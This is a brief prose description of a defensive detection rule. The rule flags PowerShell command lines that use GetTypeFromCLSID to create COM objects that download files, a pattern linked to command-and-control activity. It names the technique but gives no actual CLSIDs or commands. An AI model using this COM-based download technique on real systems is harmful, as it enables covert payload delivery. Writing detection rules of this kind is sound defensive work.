This detection rule aims to identify potentially malicious activity involving COM objects utilized via PowerShell to download files. Specifically, it targets the usage of the `GetTypeFromCLSID` method in the command line, as certain COM Class IDs (CLSIDs) can be abused in these scenarios. The rule triggers when any command line execution contains indications of this CLSID-based downloading behavior, which is often indicative of command-and-control (C2) operations. The presence of specific CLSIDs known to be associated with such behaviors is monitored through two main selections. This rule is particularly relevant for threat hunters and incident responders focusing on PowerShell abuse, especially in Windows environments. It is essential to assess the context of detected commands to distinguish between legitimate and potentially harmful activities, minimizing false positives from legitimate library uses.